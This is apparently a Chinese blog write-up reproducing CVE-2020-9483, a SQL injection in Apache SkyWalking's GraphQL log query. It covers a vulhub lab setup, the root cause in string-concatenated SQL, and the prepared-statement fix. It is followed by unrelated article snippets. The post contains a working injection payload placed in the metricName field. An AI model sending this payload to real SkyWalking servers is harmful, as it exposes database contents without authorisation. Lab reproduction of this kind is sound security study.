连人
连人

CVE-2020-9483 apache skywalking SQL注入漏洞

漏洞概述

当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参数。

环境搭建

拉取vulhub

git clone https://github.com/vulhub/vulhub.git

搭建镜像

cd /vulhub/skywalking/8.3.0-sqli
docker-compose up -d

在这里插入图片描述
访问8080端口
CVE-2020-9483 apache skywalking SQL注入漏洞_第1张图片

漏洞复现

在首页刷新即可抓到报文。
CVE-2020-9483 apache skywalking SQL注入漏洞_第2张图片

输入payload

{
    "query":"query queryLogs($condition: LogQueryCondition) {
  queryLogs(condition: $condition) {
    total
    logs {
      serviceId
      serviceName
      isError
      content
    }
  }
}
",
    "variables":{
        "condition":{
            "metricName":"INFORMATION_SCHEMA.USERS union all select h2version())a where 1=? or 1=? or 1=? --",
                        "endpointId":"1",
                    "traceId":"1",
                    "state":"ALL",
                    "stateCode":"1",
            "paging":{
                "pageSize":10
            }
        }
    }
}

查看返回结果
CVE-2020-9483 apache skywalking SQL注入漏洞_第3张图片
CVE-2020-9483 apache skywalking SQL注入漏洞_第4张图片

漏洞复现成功

漏洞原理

源码:https://github.com/apache/skywalking/releases/tag/v8.3.0
graphql是skywalking的一种查询协议,如果请求以下列JSON给出:

{
  bookById(id: "book-1"){
    id
    name
    pageCount
    author {
      firstName
      lastName
    }
  }
}

则返回结果为:

{
  "bookById": {
    "id":"book-1",
    "name":"Harry Potter and the Philosopher's Stone",
    "pageCount":223,
    "author": {
      "firstName":"Joanne",
      "lastName":"Rowling"
    }
  }
}

通常,graphql中会对对象类型进行定义:

type Query {
  bookById(id: ID): Book
}

type Book {
  id: ID
  name: String
  pageCount: Int
  author: Author
}

type Author {
  id: ID
  firstName: String
  lastName: String
}

此次产生漏洞的queryLogs为:
oap-server\server-query-plugin\query-graphql-plugin\src\main\resources\query-protocol\log.graphqls:
(这里不知道为什么下载的源码中没有,只能跑到github上看)
在这里插入图片描述

oap-server\server-query-plugin\query-graphql-plugin\src\main\java\org\apache\skywalking\oap\query\graphql\resolver\LogQuery.java
CVE-2020-9483 apache skywalking SQL注入漏洞_第5张图片

oap-server\server-storage-plugin\storage-jdbc-hikaricp-plugin\src\main\java\org\apache\skywalking\oap\server\storage\plugin\jdbc\h2\dao\H2LogQueryDAO.java
CVE-2020-9483 apache skywalking SQL注入漏洞_第6张图片

采取了直接拼接的方式。

5、修复方法
修复后使用了占位符,即预编译。

你可能感兴趣的:(漏洞复现,apache,skywalking,sql,数据库)

  • Redis为什么是单线程 hqxstudying javaredis
    Redis被设计为单线程模型,这一决策并非偶然,而是基于其核心场景和技术特性的深度优化结果。以下从多个角度详细解释其原因:一、Redis的核心优势与单线程的契合性Redis作为内存数据库,其核心优势是超高的读写性能(每秒可达数万至数十万操作)。而内存操作本身的速度极快(微秒级),此时性能瓶颈往往不在于CPU,而在于网络I/O和内存访问效率。单线程模型恰好能避免多线程带来的额外开销,从而最大化内存操
  • 变幻莫测:CoreData 中 Transformable 类型面面俱到(八) 大熊猫侯佩 Apple开发入门CoreDataTransformableDataSwiftData类型转换CodableSwift
    概述各位似秃似不秃小码农们都知道,在苹果众多开发平台中CoreData无疑是那个最简洁、拥有“官方认证”且最具兼容性的数据库框架。使用它可以让我们非常方便的搭建出App所需要的持久存储体系。不过,大家是否知道在CoreData中还存在一个Transformable类型,它到底是个啥?应用场景有哪些?在最新的SwiftData中有没有对应物?对于开发者又有哪些“见雀张罗”的撸码陷阱和最佳实践呢?在本
  • 大数据集群架构hadoop集群、Hbase集群、zookeeper、kafka、spark、flink、doris、dataeas(二) 争取不加班! hadoophbasezookeeper大数据运维
    zookeeper单节点部署wget-chttps://dlcdn.apache.org/zookeeper/zookeeper-3.8.4/apache-zookeeper-3.8.4-bin.tar.gz下载地址tarxfapache-zookeeper-3.8.4-bin.tar.gz-C/data/&&mv/data/apache-zookeeper-3.8.4-bin//data/zoo
  • 从开源小白到 Apache Member,我的成长之路 开源小秘书 云栖社区Apache高并发
    我们走过的每一步路,都会留下印记,越坚实,越清晰。近日,Apache软件基金会(ASF)官方Blog宣布全球新增40位ApacheMember,张乎兴有幸成为其中一位。目前,全球共有771位ASFMember,中国仅13位。本文将分享作者从0基础的开源小白,一路走来的感触,希望把期间的经历分享出来,让更多的人看到,世界开源舞台的中国力量。只要有持续的付出,总会有所收获。初次参与开源2014年,我加
  • 提名 Apache ShardingSphere Committer,说说方法
    优质资源分享学习路线指引(点击解锁)知识定位人群定位Python实战微信订餐小程序进阶级本课程是pythonflask+微信小程序的完美结合,从项目搭建到腾讯云部署上线,打造一个全栈订餐系统。Python量化交易实战入门级手把手带你打造一个易扩展、更安全、效率更高的量化交易系统文章首发在公众号(龙台的技术笔记),之后同步到博客园和个人网站:xiaomage.info就在前几天,收到了ApacheS
  • Apache Seata < 2.3.0 raft反序列化漏洞 墨菲安全 ApacheSeata反序列化漏洞CVE-2025-32897
    【高危】ApacheSeata<2.3.0raft反序列化漏洞漏洞描述ApacheSeata(incubating)是一款开源的分布式事务解决方案,用于在微服务架构下提供高性能和简单易用的分布式事务服务。受影响版本中,SeataServer的Raft模块的CustomDeserializer直接通过Class.forName()加载用户可控的类名,未做安全校验,攻击者可借此利用服务端已有的恶意链实
  • 从性能优化赛到社区Committer,走进赵宇捷在Apache Fory的成长之路
    ApacheFory是一个基于JIT和零拷贝的高性能多语言序列化框架,实现了高效紧凑的序列化协议,提供极致的性能、压缩率和易用性。在多语言序列化框架技术领域取得了重大突破,推动序列化技术步入高性能易用新篇章!这一切,都源自全球开发者对开源的热忱。今天,一起走近这些用代码编织跨语言数据之网的Committer~一、自我介绍您的全名:赵宇捷当前职位/角色:后端开发工程师主要领域/方向:金融加入社区/项
  • 【SpringBoot初级篇】JdbcTemplate常用方法 李少谦 springboot数据库sql
    【SpringBoot初级篇】JdbcTemplate常用方法JdbcTemplate查询JdbcTemplate插入、更新、删除插入单条数据批量插入更新单条数据批量更新删除单条数据批量操作execute执行任意的SQLNamedParameterJdbcTemplate函数场景说明update(Stringsql,@NullableObject…args)增,删,改queryForObject(
  • MyBatis SQL 执行过程原理分析(附源码) 代理层:Mapper 接口动态代理 路由层:MapperMethod 分发 核心引擎:SqlSession 执行 夜雨hiyeyu.com mybatissql数据库数据库架构javaspringbootdb
    MyBatisSQL执行过程原理分析(附源码)1.代理层:Mapper接口动态代理2.路由层:MapperMethod分发3.核心引擎:SqlSession执行4.执行器:Executor调度5.处理器层:StatementHandler执行6.结果映射:ResultSetHandler转换核心执行流程图关键设计亮点性能优化建议MyBatis的SQL执行过程可以分为6个核心阶段,我们将通过源码逐层
  • mongodb 基本概念 重生之我是一名程序员 mongodb
    mongodb基本概念基于mongo:4.4.2databasedatabase数据库tablecollection数据库表/集合rowdocument数据记录行/文档columnfield数据字段/域indexindex索引tablejoins表连接,MongoDB不支持primarykeyprimarykey主键,MongoDB自动将_id字段设置为主键MongoDB数据类型数据类型描述Str
  • 【Django开发】前后端分离django美多商城项目第3篇:用户注册业务实现,用户注册前端逻辑【附代码文档】
    教程总体简介:欢迎来到美多商城!项目需求分析1.项目主要页面介绍2.归纳项目主要模块3.知识要点项目架构设计1.项目开发模式2.项目运行机制项目介绍创建工程1.准备项目代码仓库3.创建美多商城工程配置开发环境1.新建配置文件2.指定开发环境配置文件配置Jinja2模板引擎1.安装Jinja2扩展包配置MySQL数据库3.安装PyMySQL扩展包配置Redis数据库1.安装django-redis扩
  • 喜讯!Apache SeaTunnel 荣获上海开源创新菁英荟优秀开源项目奖 数据库
    近日,在2025上海开源创新菁英荟上,ApacheSeaTunnel凭借信创生态适配与智能化技术突破,荣获「优秀开源项目奖」。这个由中国团队孵化的开源项目,已成为全球数据集成领域的标杆。信创生态:支持20+国产数据库的无缝对接SeaTunnel深度适配华为OpenGauss、阿里OceanBase等20+主流国产数据库,支持CDC(变更数据捕获)与高性能加载。在证券行业信创转型中,SeaTunne
  • 电子词典开源项目源代码完全解析
    本文还有配套的精品资源,点击获取简介:电子词典作为数字化学习工具,已由传统硬件发展为可定制的开源软件应用。本源代码提供深入理解其工作机制的机会,包括用户界面设计、词典数据库、查询引擎、翻译算法等。源代码通常由主流编程语言编写,涉及到数据结构与算法、UI设计、数据库管理、自然语言处理、本地化与多语言支持、版本控制、软件工程、API接口以及开源社区的协作和交流。1.电子词典工作原理和定制功能电子词典工
  • 使用 TCollector 写入 TDengine TDengine (老段) TDengine生态接入tdengine大数据时序数据库运维涛思数据物联网数据库
    TCollector是openTSDB的一部分,它用来采集客户端日志发送给数据库。只需要将TCollector的配置修改指向运行taosAdapter的服务器域名(或IP地址)和相应端口即可将TCollector采集的数据存在到TDengine中,可以充分利用TDengine对时序数据的高效存储查询性能和集群处理能力。前置条件要将TCollector数据写入TDengine需要以下几方面的准备工作
  • SQL SELECT INTO语句 Lu鹿夫人 sql数据库sqlserver
    SQLSELECTINTO语句通过SQL,您可以从一个表复制信息到另一个表。SELECTINTO语句从一个表复制数据,然后把数据插入到另一个新表中。SQLSELECTINTO语句注意:MYSQL数据库不支持SELECT…INTO语句,但支持INSERTINTO…SELECT。可以使用以下语句来拷贝表结构及数据:CREATETABLE新表ASSELECT*FROM旧表SQLSELECTINTO语法1
  • SQL SELECT语句的基本用法 Mnioc 学习SQL
    SQLSELECT语句的基本用法表S有三个字段:学生学号Sno,课程号Cno,成绩score。求每个学生的总分。这是一个很简单的问题,这篇博客就是源于这个问题,博主是一个大三即将入坑的菜鸟,进入公司实习的第一天,就被几个SQL查询问题难倒了。通过这篇文章复习一下数据库基本的SELECT语句,仅供参考,如有错误或不当之处还望大神们告知。这里使用的是SQLFiddle,一款在线的SQL语句练习网站链接
  • Python爬取与可视化-豆瓣电影数据 木子空间Pro 项目集锦#课程设计python信息可视化开发语言
    引言在数据科学的学习过程中,数据获取与数据可视化是两项重要的技能。本文将展示如何通过Python爬取豆瓣电影Top250的电影数据,并将这些数据存储到数据库中,随后进行数据分析和可视化展示。这个项目涵盖了从数据抓取、存储到数据可视化的整个过程,帮助大家理解数据科学项目的全流程。环境配置与准备工作在开始之前,我们需要确保安装了一些必要的库:urllib:用于发送HTTP请求和获取网页数据Beauti
  • 【Java实战】高并发场景下账户金额操作的解决方案 .猫的树 【Java实战】系列Java并发编程分布式锁高并发解决方案原子操作数据库事务
    文章目录前言:金融系统中的并发危机一、并发问题现场还原1.1问题代码示例1.2并发测试暴露问题1.3问题根源分析二、五大解决方案深度剖析2.1synchronized同步锁2.2ReentrantLock显式锁2.3CAS无锁编程(Atomic原子类)2.4数据库乐观锁2.5分布式锁(Redis实现)三、方案选型指南四、防踩坑指南总结前言:金融系统中的并发危机在支付系统、电商平台等金融场景中,账户
  • 分布式 ID 生成方案对比:Snowflake、UUID、KSUID 该怎么选? 田猿笔记 知识集合nodeJs高级应用分布式node.js
    分布式ID生成方案对比:Snowflake、UUID、KSUID该怎么选?在分布式系统中,如何生成全局唯一ID是一个常见问题。不同的ID生成方案各有优缺点,本文将对比Snowflake、Sonyflake、UUIDv1/v4、XID、KSUID以及自定义ID,并给出Node.js实现示例,帮助你选择最适合的方案。1.为什么需要分布式ID?在单机系统中,可以使用数据库自增ID(如MySQL的AUTO
  • MySQL数据库核心技术深度解析:SQL语句最佳实践与性能优化指南 有趣的灵魂465 mysql
    MySQL数据库大师之路:从语法精要到高阶优化全攻略一、开篇:构建系统化的MySQL知识体系在完成《MySQL数据库技术》课程学习后,我通过300+小时的实战演练和源码研究,形成了这套覆盖MySQL5.7/8.0核心技术的知识体系。本文不仅包含标准SQL语法,更将深入InnoDB存储引擎原理、索引实现机制和事务隔离级别的底层实现,帮助开发者跨越从"会写SQL"到"精通数据库"的鸿沟。二、数据库设计
  • PgSQL内核代码阅读|查询的两种实现方式
    PgSQL内核代码阅读|查询的两种实现方式PgSQL查询用户表时,针对带有WHERE条件的顺序扫描查询,他会从存储加载数据,然后一条一条的从页中读取数据,并将其返回给SeqScan算子。在SeqScan算子中处理WHERE过滤,即ExecQual函数处理过滤表达式。对于系统表还有另一种查询方式,即使不经过索引,也可以通过ScanKeyInit将过滤条件值带入ScanKeyData中,从而在存储层就
  • 【分布式 ID】生成唯一 ID 的几种方式 也无风雨晴 工具分布式分布式ID
    文章目录1.什么是唯一ID2.UUID2.1优点2.2缺点3.数据库自增ID3.1优点3.2缺点4.利用redis来实现自增id4.1优点4.2缺点5.雪花算法5.1优点5.2缺点6.数据库号段6.1优点6.2缺点7.小结1.什么是唯一ID分布式ID是指在分布式系统中需要生成的全局唯一的标识符。比如在电商、物流等行业,每笔订单都需要一个唯一的订单ID。通过这个ID,商家可以跟踪订单的状态,包括下单
  • 未来运维,绝绝AI 必备 AI_运维_攻城狮 ai运维人工智能
    在当今数字化时代,运维工作对于企业的稳定运行至关重要。随着科技的不断进步,人工智能(AI)和自动化技术正逐渐改变着运维行业的面貌。本文将分析运维行业的未来发展方向,探讨人工智能在运维中的应用前景、自动化运维的发展趋势,并对未来的运维工作模式和技能需求进行预测和分析,以帮助读者更好地规划自己的职业发展。一、运维行业现状目前,运维工作主要包括服务器管理、网络管理、数据库管理、应用程序监控等方面。运维工
  • Java分布式任务调度交响乐:用代码指挥千台服务器跳起精准的华尔兹 墨夶 Java学习资料1java分布式服务器
    一、架构设计:分布式任务调度的指挥系统1.1架构图(用文字构建你的想象)[调度中心]→[任务路由]→[执行器集群]↑↓││├─数据库存储─┤││└─监控告警─┘关键组件:调度中心:任务的"总指挥",负责任务注册、调度、状态监控执行器集群:任务的"舞团",每个节点都是潜在的表演者任务路由:动态分配任务的"交通调度系统"数据库存储:任务元数据的"记分牌"二、核心技术实现:分布式调度的魔法阵2.1XXL
  • MySQL调优实战 fei飛fei飞 mysql数据库
    各位小伙伴是否在工作中遇到过类似的问题?一个简单的用户查询居然用时15s,接到优化sql语句的任务又无从下手。今天,我们简单的讲讲MySql如何调优。sqlSELECT*FROMusersWHEREage>18ORDERBYcreate_timeDESC;如上图,一个简单的查询sql为啥用时如此之久呢,我们先看这个sql可能存在的问题。1.索引缺失或不合理问题:该查询涉及两个字段条件(age>18
  • PgSQL内核特性 | Brin索引 yzs87 搜索引擎数据库
    PgSQL内核特性|Brin索引数据库在进行过滤扫描或者join时,如果该表特别大,那么就需要顺序扫描表的所有数据然后进行过滤,或者扫描所有数据进行join条件探测。这对IO的负载影响特别大,当在join时,比如HashJoin的外表,需要对每个数据都进行Hash表探测,进一步影响性能。现有列存比如Infobright、Parquet、hydra等都对存储进行了类似的改进,在每个block中增加了
  • 基于springboot+mysql+jpa+html实现商品销售信息系统 五星资源 springbootmysqljava
    基于springboot+mysql+jpa+html实现商品销售信息系统一、系统介绍1、系统主要功能:2.涉及技术框架:3.本项目所用环境:二、功能展示三、其它系统四、获取源码一、系统介绍1、系统主要功能:订单管理模块商品管理模块品牌管理模块分类管理模块客户管理模块供应商管理模块2.涉及技术框架:web框架:SpringBoot数据库框架:SpingDataJPA数据库:MySql项目构建工具:
  • 【redis】介绍和安装 火龙谷 redisredis数据库缓存
    介绍Redis是一款高性能的开源内存数据库,核心采用键值对(Key-Value)存储模型。其最大优势在于数据完全基于内存操作,读写速度远超传统磁盘数据库(内存访问速度可达磁盘的数千倍,固态硬盘仍有显著差距)。支持丰富的数据结构(字符串、哈希、列表、集合等),并非简单存储单一值。提供持久化机制(RDB快照/AOF日志),确保重启后数据可恢复。具备主从复制、哨兵高可用、集群分片等分布式能力,扩展性强。
  • 数据库AICD特性之--一致性 Consistency 你都会上树? 数据库数据库javaoracle
    数据库AICD特性之–原子性Atomicity数据库AICD特性之–隔离性Isolation数据库ACID特性之–持久性Durability数据库AICD特性之–一致性Consistency一致性指数据库在事务执行前后,数据始终符合预设的完整性约束和业务规则。事务执行前数据是合法的,执行后也必须合法,不允许出现违反规则的中间状态。一致性并非独立实现,而是依赖ACID中其他特性的协同:原子性(Ato
  • mysql中的mvcc理解 simpleGq MySQLmysqljava数据库
    是什么:MVCC指的是在读已提交、可重复读这两种隔离级别下,执行普通的select操作时,访问记录的版本链的过程,可以使不同事务的读写操作并发执行,提高性能。MVCC=隐藏字段+undolog版本链+ReadView1.隐藏字段:对于聚簇索引来说,每条记录都有trx_id和roll_pointer两个隐藏列。trx_id:修改该记录的事务的idroll_pointer:每次记录修改的时候,旧的版本
  • JAVA基础 灵静志远 位运算加载Date字符串池覆盖
    一、类的初始化顺序 1 (静态变量,静态代码块)-->(变量,初始化块)--> 构造器 同一括号里的,根据它们在程序中的顺序来决定。上面所述是同一类中。如果是继承的情况,那就在父类到子类交替初始化。 二、String 1 String a = "abc"; JAVA虚拟机首先在字符串池中查找是否已经存在了值为"abc"的对象,根
  • keepalived实现redis主从高可用 bylijinnan redis
    方案说明 两台机器(称为A和B),以统一的VIP对外提供服务 1.正常情况下,A和B都启动,B会把A的数据同步过来(B is slave of A) 2.当A挂了后,VIP漂移到B;B的keepalived 通知redis 执行:slaveof no one,由B提供服务 3.当A起来后,VIP不切换,仍在B上面;而A的keepalived 通知redis 执行slaveof B,开始
  • java文件操作大全 0624chenhong java
    最近在博客园看到一篇比较全面的文件操作文章,转过来留着。 http://www.cnblogs.com/zhuocheng/archive/2011/12/12/2285290.html 转自http://blog.sina.com.cn/s/blog_4a9f789a0100ik3p.html 一.获得控制台用户输入的信息    &nbs
  • android学习任务 不懂事的小屁孩 工作
    任务 完成情况 搞清楚带箭头的pupupwindows和不带的使用 已完成 熟练使用pupupwindows和alertdialog,并搞清楚两者的区别 已完成 熟练使用android的线程handler,并敲示例代码 进行中 了解游戏2048的流程,并完成其代码工作 进行中-差几个actionbar 研究一下android的动画效果,写一个实例 已完成 复习fragem
  • zoom.js 换个号韩国红果果 oom
    它的基于bootstrap 的 https://raw.github.com/twbs/bootstrap/master/js/transition.js  transition.js模块引用顺序 <link rel="stylesheet" href="style/zoom.css"> <script src=&q
  • 详解Oracle云操作系统Solaris 11.2 蓝儿唯美 Solaris
    当Oracle发布Solaris 11时,它将自己的操作系统称为第一个面向云的操作系统。Oracle在发布Solaris 11.2时继续它以云为中心的基调。但是,这些说法没有告诉我们为什么Solaris是配得上云的。幸好,我们不需要等太久。Solaris11.2有4个重要的技术可以在一个有效的云实现中发挥重要作用:OpenStack、内核域、统一存档(UA)和弹性虚拟交换(EVS)。 
  • spring学习——springmvc(一) a-john springMVC
    Spring MVC基于模型-视图-控制器(Model-View-Controller,MVC)实现,能够帮助我们构建像Spring框架那样灵活和松耦合的Web应用程序。   1,跟踪Spring MVC的请求 请求的第一站是Spring的DispatcherServlet。与大多数基于Java的Web框架一样,Spring MVC所有的请求都会通过一个前端控制器Servlet。前
  • hdu4342 History repeat itself-------多校联合五 aijuans 数论
    水题就不多说什么了。 #include<iostream>#include<cstdlib>#include<stdio.h>#define ll __int64using namespace std;int main(){ int t; ll n; scanf("%d",&t); while(t--)
  • EJB和javabean的区别 asia007 beanejb
    EJB不是一般的JavaBean,EJB是企业级JavaBean,EJB一共分为3种,实体Bean,消息Bean,会话Bean,书写EJB是需要遵循一定的规范的,具体规范你可以参考相关的资料.另外,要运行EJB,你需要相应的EJB容器,比如Weblogic,Jboss等,而JavaBean不需要,只需要安装Tomcat就可以了   1.EJB用于服务端应用开发, 而JavaBeans
  • Struts的action和Result总结 百合不是茶 strutsAction配置Result配置
        一:Action的配置详解:      下面是一个Struts中一个空的Struts.xml的配置文件     <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE struts PUBLIC &quo
  • 如何带好自已的团队 bijian1013 项目管理团队管理团队
    在网上看到博客" 怎么才能让团队成员好好干活"的评论,觉得写的比较好。 原文如下: 我做团队管理有几年了吧,我和你分享一下我认为带好团队的几点: 1.诚信         对团队内成员,无论是技术研究、交流、问题探讨,要尽可能的保持一种诚信的态度,用心去做好,你的团队会感觉得到。 2.努力提
  • Java代码混淆工具 sunjing ProGuard
    Open Source Obfuscators ProGuard http://java-source.net/open-source/obfuscators/proguardProGuard is a free Java class file shrinker and obfuscator. It can detect and remove unused classes, fields, m
  • 【Redis三】基于Redis sentinel的自动failover主从复制 bit1129 redis
    在第二篇中使用2.8.17搭建了主从复制,但是它存在Master单点问题,为了解决这个问题,Redis从2.6开始引入sentinel,用于监控和管理Redis的主从复制环境,进行自动failover,即Master挂了后,sentinel自动从从服务器选出一个Master使主从复制集群仍然可以工作,如果Master醒来再次加入集群,只能以从服务器的形式工作。   什么是Sentine
  • 使用代理实现Hibernate Dao层自动事务 白糖_ DAOspringAOP框架Hibernate
    都说spring利用AOP实现自动事务处理机制非常好,但在只有hibernate这个框架情况下,我们开启session、管理事务就往往很麻烦。 public void save(Object obj){ Session session = this.getSession(); Transaction tran = session.beginTransaction(); try
  • maven3实战读书笔记 braveCS maven3
    Maven简介 是什么? Is a software project management and comprehension tool.项目管理工具 是基于POM概念(工程对象模型) [设计重复、编码重复、文档重复、构建重复,maven最大化消除了构建的重复] [与XP:简单、交流与反馈;测试驱动开发、十分钟构建、持续集成、富有信息的工作区]     功能:
  • 编程之美-子数组的最大乘积 bylijinnan 编程之美
    public class MaxProduct { /** * 编程之美 子数组的最大乘积 * 题目: 给定一个长度为N的整数数组,只允许使用乘法,不能用除法,计算任意N-1个数的组合中乘积中最大的一组,并写出算法的时间复杂度。 * 以下程序对应书上两种方法,求得“乘积中最大的一组”的乘积——都是有溢出的可能的。 * 但按题目的意思,是要求得这个子数组,而不
  • 读书笔记-2 chengxuyuancsdn 读书笔记
    1、反射 2、oracle年-月-日 时-分-秒 3、oracle创建有参、无参函数 4、oracle行转列 5、Struts2拦截器 6、Filter过滤器(web.xml) 1、反射 (1)检查类的结构 在java.lang.reflect包里有3个类Field,Method,Constructor分别用于描述类的域、方法和构造器。 2、oracle年月日时分秒 s
  • [求学与房地产]慎重选择IT培训学校 comsci it
          关于培训学校的教学和教师的问题,我们就不讨论了,我主要关心的是这个问题       培训学校的教学楼和宿舍的环境和稳定性问题       我们大家都知道,房子是一个比较昂贵的东西,特别是那种能够当教室的房子... &nb
  • RMAN配置中通道(CHANNEL)相关参数 PARALLELISM 、FILESPERSET的关系 daizj oraclermanfilespersetPARALLELISM
    RMAN配置中通道(CHANNEL)相关参数 PARALLELISM 、FILESPERSET的关系 转 PARALLELISM --- 我们还可以通过parallelism参数来指定同时"自动"创建多少个通道: RMAN > configure device type disk parallelism 3 ; 表示启动三个通道,可以加快备份恢复的速度。
  • 简单排序:冒泡排序 dieslrae 冒泡排序
    public void bubbleSort(int[] array){ for(int i=1;i<array.length;i++){ for(int k=0;k<array.length-i;k++){ if(array[k] > array[k+1]){
  • 初二上学期难记单词三 dcj3sjt126com sciet
    concert 音乐会 tonight 今晚 famous 有名的;著名的 song 歌曲 thousand 千 accident 事故;灾难 careless 粗心的,大意的 break 折断;断裂;破碎 heart 心(脏) happen  偶尔发生,碰巧 tourist 旅游者;观光者 science (自然)科学 marry 结婚 subject 题目;
  • I.安装Memcahce 1. 安装依赖包libevent Memcache需要安装libevent,所以安装前可能需要执行 Shell代码 收藏代码 dcj3sjt126com redis
    wget http://download.redis.io/redis-stable.tar.gz tar xvzf redis-stable.tar.gz cd redis-stable make   前面3步应该没有问题,主要的问题是执行make的时候,出现了异常。 异常一: make[2]: cc: Command not found 异常原因:没有安装g
  • 并发容器 shuizhaosi888 并发容器
       通过并发容器来改善同步容器的性能,同步容器将所有对容器状态的访问都串行化,来实现线程安全,这种方式严重降低并发性,当多个线程访问时,吞吐量严重降低。    并发容器ConcurrentHashMap       替代同步基于散列的Map,通过Lock控制。   &nb
  • Spring Security(12)——Remember-Me功能 234390216 Spring SecurityRemember Me记住我
    Remember-Me功能   目录   1.1     概述 1.2     基于简单加密token的方法 1.3     基于持久化token的方法 1.4     Remember-Me相关接口和实现
  • 位运算 焦志广 位运算
    一、位运算符C语言提供了六种位运算符: & 按位与 | 按位或 ^ 按位异或 ~ 取反 << 左移 >> 右移 1. 按位与运算 按位与运算符"&"是双目运算符。其功能是参与运算的两数各对应的二进位相与。只有对应的两个二进位均为1时,结果位才为1 ,否则为0。参与运算的数以补码方式出现。 例如:9&am
  • nodejs 数据库连接 mongodb mysql liguangsong mongodbmysqlnode数据库连接
    1.mysql 连接    package.json中dependencies加入     "mysql":"~2.7.0"    执行 npm install      在config 下创建文件 database.js    
  • java动态编译 olive6615 javaHotSpotjvm动态编译
        在HotSpot虚拟机中,有两个技术是至关重要的,即动态编译(Dynamic compilation)和Profiling。     HotSpot是如何动态编译Javad的bytecode呢?Java bytecode是以解释方式被load到虚拟机的。HotSpot里有一个运行监视器,即Profile Monitor,专门监视
  • Storm0.9.5的集群部署配置优化 roadrunners 优化storm.yaml
    nimbus结点配置(storm.yaml)信息: # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional inf
  • 101个MySQL 的调节和优化的提示 tomcat_oracle mysql
     1. 拥有足够的物理内存来把整个InnoDB文件加载到内存中——在内存中访问文件时的速度要比在硬盘中访问时快的多。   2. 不惜一切代价避免使用Swap交换分区 – 交换时是从硬盘读取的,它的速度很慢。   3. 使用电池供电的RAM(注:RAM即随机存储器)。   4. 使用高级的RAID(注:Redundant Arrays of Inexpensive Disks,即磁盘阵列
  • zoj 3829 Known Notation(贪心) 阿尔萨斯 ZOJ
    题目链接:zoj 3829 Known Notation 题目大意:给定一个不完整的后缀表达式,要求有2种不同操作,用尽量少的操作使得表达式完整。 解题思路:贪心,数字的个数要要保证比∗的个数多1,不够的话优先补在开头是最优的。然后遍历一遍字符串,碰到数字+1,碰到∗-1,保证数字的个数大于等1,如果不够减的话,可以和最后面的一个数字交换位置(用栈维护十分方便),因为添加和交换代价都是1
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他